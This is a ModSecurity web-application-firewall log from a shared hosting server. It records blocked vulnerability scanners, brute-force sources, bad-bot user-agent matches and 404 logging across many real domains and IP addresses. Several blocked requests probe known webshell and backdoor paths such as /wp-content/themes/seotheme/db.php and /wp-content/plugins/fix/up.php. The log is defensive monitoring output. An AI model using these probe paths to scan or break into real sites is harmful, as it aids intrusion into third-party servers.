[Tue May 26 13:35:24.382069 2026] [security2:error] [pid 536875:tid 537107] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUQ-r_-FTveSGlx1HPNAAAAOs"]
[Tue May 26 13:35:25.065825 2026] [security2:error] [pid 536875:tid 537062] [client 168.119.53.160:18926] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVUROr_-FTveSGlx1HPSwAAAL4"], referer: http://ucdc.co.in/
[Tue May 26 13:35:25.831869 2026] [security2:error] [pid 536875:tid 537069] [client 74.249.173.207:4492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "elipress.com.br.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahVURer_-FTveSGlx1HPaQAAAMU"]
[Tue May 26 13:35:26.273583 2026] [security2:error] [pid 536875:tid 537122] [client 74.249.173.207:4482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "elipress.com.br.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahVURur_-FTveSGlx1HPdAAAAPo"]
[Tue May 26 13:35:26.954076 2026] [security2:error] [pid 536875:tid 537121] [client 74.249.173.207:4510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "elipress.com.br.md-74.webhostbox.net"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVURur_-FTveSGlx1HPiAAAAPk"]
[Tue May 26 13:35:27.035828 2026] [security2:error] [pid 536875:tid 537037] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVURur_-FTveSGlx1HPgAAAAKU"]
[Tue May 26 13:35:27.301042 2026] [security2:error] [pid 536875:tid 537104] [client 202.76.134.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVURur_-FTveSGlx1HPhwAAAOg"]
[Tue May 26 13:35:29.232058 2026] [security2:error] [pid 536875:tid 537126] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUSOr_-FTveSGlx1HPuQAAAP4"]
[Tue May 26 13:35:30.849321 2026] [security2:error] [pid 536875:tid 537123] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUSur_-FTveSGlx1HP4wAAAPs"]
[Tue May 26 13:35:31.112657 2026] [security2:error] [pid 536875:tid 537025] [client 85.208.96.211:11842] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/2026-06-05/"] [unique_id "ahVUS-r_-FTveSGlx1HP9gAAAJk"]
[Tue May 26 13:35:31.112786 2026] [security2:error] [pid 536875:tid 537025] [client 85.208.96.211:11842] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/2026-06-05/"] [unique_id "ahVUS-r_-FTveSGlx1HP9gAAAJk"]
[Tue May 26 13:35:32.881344 2026] [security2:error] [pid 536875:tid 537084] [client 185.77.220.199:61437] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVUTOr_-FTveSGlx1HQFwAAANQ"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:35:33.544148 2026] [security2:error] [pid 536875:tid 537008] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUTer_-FTveSGlx1HQNgAAAIg"]
[Tue May 26 13:35:34.125922 2026] [security2:error] [pid 536875:tid 537109] [client 46.105.46.43:29247] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "canopykaapi.com"] [uri "/robots.txt"] [unique_id "ahVUTur_-FTveSGlx1HQRwAAAO0"]
[Tue May 26 13:35:34.126062 2026] [security2:error] [pid 536875:tid 537109] [client 46.105.46.43:29247] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "canopykaapi.com"] [uri "/robots.txt"] [unique_id "ahVUTur_-FTveSGlx1HQRwAAAO0"]
[Tue May 26 13:35:35.070918 2026] [security2:error] [pid 536875:tid 537013] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUTur_-FTveSGlx1HQVgAAAI0"]
[Tue May 26 13:35:35.492336 2026] [security2:error] [pid 536875:tid 537085] [client 159.69.14.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVUT-r_-FTveSGlx1HQcQAAANU"]
[Tue May 26 13:35:35.979773 2026] [security2:error] [pid 536875:tid 537026] [client 74.249.173.207:4233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "elipress.com.br.md-74.webhostbox.net"] [uri "/cache.php"] [unique_id "ahVUT-r_-FTveSGlx1HQggAAAJo"]
[Tue May 26 13:35:36.723978 2026] [security2:error] [pid 536875:tid 537038] [client 104.23.221.194:12970] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVUT-r_-FTveSGlx1HQgQAAAKY"]
[Tue May 26 13:35:36.731003 2026] [security2:error] [pid 536875:tid 537010] [client 159.69.14.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVUUOr_-FTveSGlx1HQmAAAAIo"]
[Tue May 26 13:35:37.934127 2026] [security2:error] [pid 536875:tid 537033] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUUer_-FTveSGlx1HQuwAAAKE"]
[Tue May 26 13:35:38.760698 2026] [security2:error] [pid 536875:tid 536966] [remote 194.26.192.219:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-plain.php"] [unique_id "ahVUUur_-FTveSGlx1HQ6QABAlo"], referer: www.google.com
[Tue May 26 13:35:38.774445 2026] [security2:error] [pid 536875:tid 536971] [remote 194.26.192.219:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVUUur_-FTveSGlx1HQ8AAA6l8"]
[Tue May 26 13:35:38.781884 2026] [security2:error] [pid 536875:tid 536983] [remote 194.26.192.219:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVUUur_-FTveSGlx1HQ6wAAy2s"], referer: www.google.com
[Tue May 26 13:35:39.257038 2026] [security2:error] [pid 536875:tid 536976] [remote 194.26.192.219:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/oatxmcbk.php"] [unique_id "ahVUU-r_-FTveSGlx1HQ_AAA92Q"], referer: www.google.com
[Tue May 26 13:35:39.298886 2026] [security2:error] [pid 536875:tid 536975] [remote 194.26.192.219:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVUU-r_-FTveSGlx1HQ_wAAuWM"], referer: www.google.com
[Tue May 26 13:35:39.421204 2026] [security2:error] [pid 536875:tid 537012] [client 193.3.23.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVUU-r_-FTveSGlx1HRBQAAAIw"], referer: https://www.anujtradingco.com/
[Tue May 26 13:35:39.566876 2026] [security2:error] [pid 536875:tid 536999] [remote 194.26.192.219:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVUU-r_-FTveSGlx1HRDAAAw3s"]
[Tue May 26 13:35:39.697569 2026] [security2:error] [pid 536875:tid 537081] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUU-r_-FTveSGlx1HQ_gAAANE"]
[Tue May 26 13:35:39.744350 2026] [security2:error] [pid 536875:tid 537000] [remote 194.26.192.219:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVUU-r_-FTveSGlx1HRDgAA2nw"]
[Tue May 26 13:35:39.916524 2026] [security2:error] [pid 536875:tid 536980] [remote 194.26.192.219:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVUU-r_-FTveSGlx1HRFgAA2Gg"]
[Tue May 26 13:35:40.169946 2026] [security2:error] [pid 536875:tid 536877] [remote 194.26.192.219:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVUVOr_-FTveSGlx1HRGgAAwAE"]
[Tue May 26 13:35:40.546441 2026] [security2:error] [pid 536875:tid 537017] [client 194.26.192.219:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVUUur_-FTveSGlx1HQ6gAAkVk"], referer: www.google.com
[Tue May 26 13:35:40.840040 2026] [security2:error] [pid 536875:tid 537114] [client 193.3.23.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVUVOr_-FTveSGlx1HRLQAAAPI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1135507&moderation-hash=a60093699166c1bb92a1b77248c9412a
[Tue May 26 13:35:41.676102 2026] [security2:error] [pid 536875:tid 536884] [remote 167.99.5.1:38828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.5.99.167.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVUVer_-FTveSGlx1HRQQAAwwg"]
[Tue May 26 13:35:42.724156 2026] [security2:error] [pid 536875:tid 537009] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUVur_-FTveSGlx1HRXQAAAIk"]
[Tue May 26 13:35:44.484899 2026] [security2:error] [pid 536875:tid 537128] [client 66.249.70.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVUWOr_-FTveSGlx1HRnAAAAQA"]
[Tue May 26 13:35:45.360044 2026] [security2:error] [pid 536875:tid 537032] [client 193.3.23.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVUWer_-FTveSGlx1HRvgAAAKA"], referer: https://anujtradingco.com
[Tue May 26 13:35:45.636912 2026] [security2:error] [pid 536875:tid 537011] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVUWer_-FTveSGlx1HRxAAAAIs"]
[Tue May 26 13:35:46.346820 2026] [security2:error] [pid 536875:tid 537006] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUWer_-FTveSGlx1HRzgAAAIY"]
[Tue May 26 13:35:47.010827 2026] [security2:error] [pid 536875:tid 537012] [remote 194.26.192.219:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVUVer_-FTveSGlx1HROQAAmgc"], referer: www.google.com
[Tue May 26 13:35:48.629297 2026] [security2:error] [pid 536875:tid 537058] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUXOr_-FTveSGlx1HSCgAAALo"]
[Tue May 26 13:35:50.594709 2026] [security2:error] [pid 536875:tid 537023] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUXur_-FTveSGlx1HSPQAAAJc"]
[Tue May 26 13:35:52.067860 2026] [security2:error] [pid 536875:tid 537034] [client 123.18.90.161:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUX-r_-FTveSGlx1HSYgAAAKI"]
[Tue May 26 13:35:52.681740 2026] [security2:error] [pid 536875:tid 537121] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUYOr_-FTveSGlx1HSdAAAAPk"]
[Tue May 26 13:35:54.759490 2026] [security2:error] [pid 536875:tid 537076] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUYur_-FTveSGlx1HSuwAAAMw"]
[Tue May 26 13:35:55.479258 2026] [security2:error] [pid 536875:tid 536986] [remote 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUY-r_-FTveSGlx1HS2AAAk24"]
[Tue May 26 13:35:55.479465 2026] [security2:error] [pid 536875:tid 537019] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUY-r_-FTveSGlx1HS2AAAk24"]
[Tue May 26 13:35:55.607556 2026] [security2:error] [pid 536875:tid 537117] [client 34.150.254.2:50687] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVUY-r_-FTveSGlx1HS3AAAAPU"]
[Tue May 26 13:35:55.980136 2026] [security2:error] [pid 536875:tid 537059] [client 34.150.254.2:50919] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVUY-r_-FTveSGlx1HS4wAAALs"]
[Tue May 26 13:35:56.337927 2026] [security2:error] [pid 536875:tid 537123] [client 34.150.254.2:50276] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVUZOr_-FTveSGlx1HS7QAAAPs"]
[Tue May 26 13:35:56.817675 2026] [security2:error] [pid 536875:tid 537017] [client 34.150.254.2:49861] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVUZOr_-FTveSGlx1HS-gAAAJE"]
[Tue May 26 13:35:56.945071 2026] [security2:error] [pid 536875:tid 537088] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUZOr_-FTveSGlx1HS8wAAANg"]
[Tue May 26 13:35:57.330707 2026] [security2:error] [pid 536875:tid 537066] [client 34.150.254.2:51731] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVUZer_-FTveSGlx1HTCQAAAMI"]
[Tue May 26 13:35:57.332551 2026] [security2:error] [pid 536875:tid 536925] [remote 141.95.202.18:39712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVUZer_-FTveSGlx1HTCAAAzDE"]
[Tue May 26 13:35:57.767271 2026] [security2:error] [pid 536875:tid 536928] [remote 5.42.158.148:40064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVUZer_-FTveSGlx1HTDQAA1jQ"]
[Tue May 26 13:35:57.772891 2026] [security2:error] [pid 536875:tid 537026] [client 34.150.254.2:51663] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVUZer_-FTveSGlx1HTFwAAAJo"]
[Tue May 26 13:35:57.937142 2026] [security2:error] [pid 536875:tid 537049] [client 34.150.254.2:51307] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVUZer_-FTveSGlx1HTGAAAALE"]
[Tue May 26 13:35:58.284049 2026] [security2:error] [pid 536875:tid 537103] [client 34.150.254.2:55239] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVUZur_-FTveSGlx1HTJQAAAOc"]
[Tue May 26 13:35:58.564777 2026] [security2:error] [pid 536875:tid 537098] [client 34.150.254.2:51397] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVUZur_-FTveSGlx1HTLQAAAOI"]
[Tue May 26 13:35:58.597708 2026] [security2:error] [pid 536875:tid 537037] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUZur_-FTveSGlx1HTIwAAAKU"]
[Tue May 26 13:35:59.067513 2026] [security2:error] [pid 536875:tid 537119] [client 34.150.254.2:51070] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVUZ-r_-FTveSGlx1HTOQAAAPc"]
[Tue May 26 13:35:59.340368 2026] [security2:error] [pid 536875:tid 537093] [client 34.150.254.2:50575] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVUZ-r_-FTveSGlx1HTQAAAAN0"]
